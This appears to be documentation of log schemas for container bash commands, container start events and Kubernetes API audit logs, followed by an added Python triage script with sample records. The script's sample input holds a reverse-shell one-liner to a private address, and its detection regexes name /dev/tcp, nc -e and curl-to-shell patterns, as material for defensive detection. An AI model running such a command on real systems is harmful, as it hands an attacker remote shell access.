Container Bash Log

| Name | Type | Meaning |
| --- | --- | --- |
| image_id | string | Image ID |
| container_id | string | Container ID |
| image_name | string | Image name |
| container_name | string | Container name |
| cmd | string | Command line executed in the container (command and arguments) |

Sample record:

{"cmd": "exit","container_id": "fcdbbfae","container_name": "/reverseshell","image_id": "sha256:eeb6ee3f","image_name": "centos:7"}
Container Start Audit Log

| Name | Type | Meaning |
| --- | --- | --- |
| image_id | string | Image ID |
| container_id | string | Container ID |
| image_name | string | Image name |
| container_name | string | Container name |
| status | string | Container status |
| id | string | Container ID (the ID of the object the event refers to) |
| from | string | Source image (the image the container was created from) |
| Type | string | Event type |
| Action | string | Action that triggered the event |
| scope | string | Deployment mode (scope of the event, e.g. local) |

Sample record (an exec into a running container; fields not available for this event type are filled with "-"):

{"Action": "exec_start","container_id": "a197708a59b2809","container_name": "-","from": "registry.xxx.com/service/mysql@sha256:xxx","id": "a197708a59b2809","image_id": "-","image_name": "-","scope": "local","status": "exec_start","Type": "container"}
Kubernetes API Audit Log

| Name | Type | Meaning |
| --- | --- | --- |
| image_id | string | Image ID |
| container_id | string | Container ID |
| image_name | string | Image name |
| container_name | string | Container name |
| clusterId | string | Cluster ID |
| kind | string | API event type |
| apiVersion | string | API version |
| level | string | Audit level (Metadata, Request, or RequestResponse) |
| auditID | string | Unique ID of the audit record |
| stage | string | Stage of the K8s API request (e.g. RequestReceived, ResponseComplete) |
| requestURI | string | K8s API request URI |
| verb | string | Operation type (e.g. get, list, create, delete) |
| sourceIPs | string | IP address of the requester |
| userAgent | string | User agent of the client (container or user) that issued the request |
| requestReceivedTimestamp | string | Timestamp at which the request reached the apiserver |
| stageTimestamp | string | Timestamp at which the current stage processed the request |

Sample record (a list of CronJobs issued by the controller manager; container-level fields are "-" because the request is not tied to a container):

{"apiVersion": "audit.k8s.io/v1","auditID": "xxx-xxx-xxx-9d69-xxx","clusterId": "-","container_id": "-","container_name": "-","image_id": "-","image_name": "-","kind": "Event","level": "Request","requestReceivedTimestamp": "2024-01-01T13:20:48.899288Z","requestURI": "/apis/batch/v1beta1/cronjobs?limit=500","sourceIPs": "127.0.0.0","stage": "ResponseComplete","stageTimestamp": "2024-01-01T13:20:48.900236Z","userAgent": "kube-controller-manager/v1.18.0 (linux/amd64) kubernetes","verb": "list"}
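The three schemas above (container bash log, container start audit log, Kubernetes API audit log) share the container_id/container_name/image_id/image_name fields and differ in the rest. The following is an added example, not code from the original page or from the product it documents: it classifies JSON-line records by the documented field names and applies a few triage rules to each type. The sample records are constructed for this example (the two records taken from the page are reused unchanged, the others are invented), and the rules, regular expressions and trusted user-agent list are illustrative assumptions to be tuned for a real environment.

```python
"""Triage rules over the three documented record types (added example)."""
import json
import re
from typing import Iterable

# Constructed sample input: the page's own bash and exec_start records, the
# page's CronJob list, plus one invented reverse-shell command and one invented
# kubectl exec into a pod from an external address.
SAMPLE_LINES = [
    '{"cmd": "exit","container_id": "fcdbbfae","container_name": "/reverseshell",'
    '"image_id": "sha256:eeb6ee3f","image_name": "centos:7"}',
    '{"cmd": "bash -i >& /dev/tcp/10.0.0.5/4444 0>&1","container_id": "fcdbbfae",'
    '"container_name": "/reverseshell","image_id": "sha256:eeb6ee3f","image_name": "centos:7"}',
    '{"Action": "exec_start","container_id": "a197708a59b2809","container_name": "-",'
    '"from": "registry.xxx.com/service/mysql@sha256:xxx","id": "a197708a59b2809",'
    '"image_id": "-","image_name": "-","scope": "local","status": "exec_start","Type": "container"}',
    '{"apiVersion": "audit.k8s.io/v1","auditID": "xxx-xxx-xxx-9d69-xxx","kind": "Event",'
    '"level": "Request","requestURI": "/apis/batch/v1beta1/cronjobs?limit=500",'
    '"sourceIPs": "127.0.0.0","stage": "ResponseComplete",'
    '"userAgent": "kube-controller-manager/v1.18.0 (linux/amd64) kubernetes","verb": "list"}',
    '{"apiVersion": "audit.k8s.io/v1","auditID": "0000-exec-0001","kind": "Event",'
    '"level": "RequestResponse","requestURI": "/api/v1/namespaces/default/pods/web/exec?command=sh&stdin=true",'
    '"sourceIPs": "203.0.113.5","stage": "ResponseComplete",'
    '"userAgent": "kubectl/v1.28.0 (linux/amd64) kubernetes/abcdef","verb": "create"}',
]

# Assumed heuristics for reverse shells and download-and-run one-liners.
SUSPICIOUS_CMD = re.compile(
    r"/dev/tcp/|\bnc\b[^|]*\s-e\s|\bbash\s+-i\b|\b(curl|wget)\b.*\|\s*(ba)?sh\b",
    re.IGNORECASE,
)
# Assumed list of high-value API paths: secrets, pod exec, cluster role bindings.
SENSITIVE_URI = re.compile(r"/secrets(\?|/|$)|/pods/[^/]+/exec|/clusterrolebindings")
MUTATING_VERBS = {"create", "update", "patch", "delete", "deletecollection"}
# Assumed control-plane components whose user agents are expected on loopback.
TRUSTED_AGENT_PREFIXES = ("kube-controller-manager/", "kube-scheduler/", "kubelet/")


def classify(rec: dict) -> str:
    """Map a record to one of the three documented log types by its fields."""
    if "cmd" in rec:
        return "bash"
    if str(rec.get("apiVersion", "")).startswith("audit.k8s.io/"):
        return "k8s_audit"
    if "Action" in rec and rec.get("Type") == "container":
        return "container_event"
    return "unknown"


def triage(rec: dict) -> list[str]:
    """Return the names of the rules that fire on a single record."""
    findings: list[str] = []
    kind = classify(rec)
    if kind == "bash":
        if SUSPICIOUS_CMD.search(str(rec.get("cmd", ""))):
            findings.append("suspicious_shell_command")
    elif kind == "container_event":
        # exec into a running container is interactive access worth reviewing
        if rec.get("Action") == "exec_start":
            findings.append("exec_into_container")
    elif kind == "k8s_audit":
        uri = str(rec.get("requestURI", ""))
        verb = str(rec.get("verb", ""))
        if SENSITIVE_URI.search(uri):
            findings.append("sensitive_resource_access")
        if verb in MUTATING_VERBS and uri.startswith("/apis/rbac.authorization.k8s.io/"):
            findings.append("rbac_mutation")
        # the page documents sourceIPs as a string; upstream audit events use a list
        ips = rec.get("sourceIPs", "")
        ip = str(ips[0]) if isinstance(ips, list) and ips else str(ips)
        agent = str(rec.get("userAgent", ""))
        if not ip.startswith("127.") and not agent.startswith(TRUSTED_AGENT_PREFIXES):
            findings.append("external_client")
    return findings


def triage_lines(lines: Iterable[str]) -> list[tuple[str, str, list[str]]]:
    """Parse JSON lines; return (log_type, record_key, findings) for records that fire."""
    out = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        rec = json.loads(line)
        hits = triage(rec)
        if hits:
            key = rec.get("container_id") or rec.get("id") or rec.get("auditID") or "-"
            out.append((classify(rec), str(key), hits))
    return out


if __name__ == "__main__":
    for log_type, key, hits in triage_lines(SAMPLE_LINES):
        print(f"{log_type:16} {key:24} {', '.join(hits)}")
```

Only three of the five sample records produce findings: the page's own `exit` command and the controller manager's CronJob list (loopback source, trusted user agent, non-mutating verb) pass silently, while the reverse-shell command, the `exec_start` event and the pod exec from a non-loopback address are reported. Because the page types sourceIPs as a string while upstream Kubernetes audit events carry a list, the example accepts both shapes before testing the address.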